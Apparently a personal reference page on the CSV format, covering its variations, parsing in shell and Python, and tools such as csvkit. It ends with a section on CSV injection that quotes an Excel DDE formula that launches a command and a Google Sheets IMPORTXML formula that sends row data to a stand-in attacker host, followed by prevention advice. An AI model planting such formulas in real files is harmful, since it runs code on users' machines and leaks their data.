------------------------------------------------------------------------------- CSV - Comma Separated Values The CSV seems like a simple format and for most data it is. But it can become much more more complex when specific characters are added. Basically simple forms are easy to parse, other forms much much harder! Then again so can XML, and JSON, or any other text database format. But those are more thoroughly defined than CVS, which has a number of variations. The main advantage is that you can customise the format to some extent. --- Simple CSV (no spaces around commas!) A,B,C,D Quotes CSV (not all feilds need to be quoted!) A,B,"This is a ""quoted"" string, with a comma and quotes.",D Quoted strings could include linebreaks! A,B,"This is a ""quoted"" string, with a commas, quotes and even a newline.",D --- Additional notes... The number of fields per record in a given CVS should be constant. First line typically holds the field names, but there is no way to record this fact in the CSV file itself. Human identification is needed. Typically fields with leading or trailing spaces are quoted to avoid confusion. But that is not always the case. Also you typically quote all the fields or none of them to make parsing easier. It is a Mixed-Encoding that makes the format very hard to parse. With a always quote scheme records start with '^"' end in '"$' and separated by '","' Unicode can make it harder. Especially as UTF-16 may use Unicode commas and quotes! On the other hand Unicode (actually ASCII) can also make it easier as there are special record character markers (not commas and quotes) that are not used in non-binary text. But then you loose the 'text editable' nature of CVS. See Variations below. An overview, including variations is http://www.creativyst.com/Doc/Articles/CSV/CSV01.htm Splitting quoted strings in a CVS https://stackoverflow.com/questions/6209/split-a-string Stop Rolling Your Own CSV Parser! http://secretgeek.net/csv_trouble ------------------------------------------------------------------------------- Variations... Embedded quotes are "" or \" Embedded commas are \, in unquoted fields Embeded linefeeds are "\n" How is binary elements declared and stored? Field delimiter used... , ; : \t | TAB (\t) is particularly useful as was often used for database tables However they may sometimes be accidentally converted to spaces. ASCII Code has specific control characters meant for use as record structures. * FS - File Separator code 28 034 0x1C ctrl-\  * GS - Group Separator 29 035 0x1D ctrl-]  * RS - Record Separator 30 036 0x1E ctrl-^  * US - Unit Separator 31 037 0x1F ctrl-_  However these are often not easily editable, and never really caught on. A suggested variation is multi-table and column specifications using a special @@ prefix... @@Table: Customers @@Columns: custRef, title, locationID, balance, notes 512,"IBM",36,2406.34,"" 883,"Johson Movers",572,0,"47A compliant" .... @@Table: Invoices @@Columns: custRef, invDate, Total, Tax 423,"12/14/2003",3500,854.17 822,"03/01/2002",1476.34,322.05 .... Which can also have data type specifications @@Table: Invoices @@Columns: custRef(int), invDate(date), total(decimal:10.2) 423,"12/14/2003",3500 822,"03/01/2002",1476.34 .... If null values are not allowed: "custRef(int)+" for multiple integers ------------------------------------------------------------------------------- Applications and Libraries csvkit https://csvkit.readthedocs.io/ Command line CSV tools in2cvs convert XLS, JSON, (and others?) to CSV csvclean make the data 'clean' csvformat format data correctly csvgrep "grep" with column specification csvcut just like UNIX "cut" csvjoin SQL-like joins csvsort csvjson convert to json csvlook beautify the data CSV and perl modules perl-Class-CSV A good basic CSV read/writer (not a serial processor) perl-Text-CSV More complex CSV handler, can process serially. perl-Text-CSV-Separator figure out the field separator of a random CSV CSV and python import csv reader = csv.reader(open("some.csv")) for row in reader: print row Database using CSV storage https://dzone.com/articles/the-csv-file-format-is-already-the-best-now-and-wi for more useful hints of processing LARGE CSV files https://conference.hitb.org/hitbsecconf2018ams/materials/D1%20COMMSEC%20-%20Thomas%20Debize%20-%20Modern%20Pentest%20Tricks%20for%20Faster,%20Wider,%20Greater%20Engagements.pdf ------------------------------------------------------------------------------- Shell parsing CSV (VERY simplistic) ab1pp1,ab1,pp1 bb1oo1,bb1,oo1 cc1qq1,cc1,qq1 Can be parsed using (known number of fields) # backup current IFS (Internal File Separator) IFS_backup="${IFS}" # change IFS to directly read input file into 3 variables a,b,c IFS="," while read a b c do echo "LOGIN:$a LASTNAME:$b FIRSTNAME:$c" done < fileA.csv # restore IFS IFS="${IFS_backup}" But if ALL fields are quoted "ab1,pp1","ab1","pp1" "bb1,oo1","bb1","oo1" "cc1,qq1","cc1","qq1" then you are better of 'cutting' on the quotes. while read line; do unset fields for i in {2..6..2}; do fields=( "${fields[@]}" "$(echo "$line" | cut -d '"' -f${i})" ) done echo ${fields[0]} - ${fields[1]} - ${fields[2]} unset fields done But generally you need a full tokenizer to parse CSV, so as to correctly handle quoted commas. -- look at "csvkit" --- Only a letter by letter technique generally works... Loop on the string letter by letter. If current_letter == quote : If ( inside_quote and this quote is escaped) : append quote to current_word Else toggle inside_quote variable. Else If (current_letter ==comma and not inside_quote) : push current_word into array and clear current_word. Else append the current_letter to current_word When the loop is done push the current_word into array ------------------------------------------------------------------------------- Beware CSV injection is possible! http://georgemauer.net/2017/10/07/csv-injection.html This is particular true if the CSV is loaded into a Spreadsheet! UserId,BillToDate,ProjectName,Description,DurationMinutes 1,2017-07-25,Test Project,Flipped the jibbet,60 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240 2,2017-07-25,Important Client,"=2+5", 240 That "=2+5" feidl becomes "7" in both Excel and Google Sheets --- Vector 1... Excel Change it to "=2+5+cmd|' /C calc'!A0" and in Excel the Windows Calculator is started! Though their is a rather useless and inexact warning of "Only click yes if you trust the source of this workbook" --- Vector 2... Google Sheets Use the function "=IMPORTXML(url, xpath_query)" which will send data to a web server to retrieve a result! For example use... "=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")" And it sent the spreadsheet data to some server, while only showing whatever the remote webserver wants you to see in that cell! No warnings, no popups, no reason to think that anything is amiss. But google sheets can also pull data from other spreadsheets, as long as the attacker knows the ID they want. This also works in Excel, and has been used by police to track criminals. Criminals can also use this in there data, to get a indication someone put that data in a spreadsheet somewhere, and thus snooping around. --- Prevention On any cell starting with any of the characters '=-+@", should be prefixed with a TAB inside the quotes. The TAB will not be seen, but the formula or string can. Of course maybe you want the formula in the CSV, as was exported that way on purpose! -------------------------------------------------------------------------------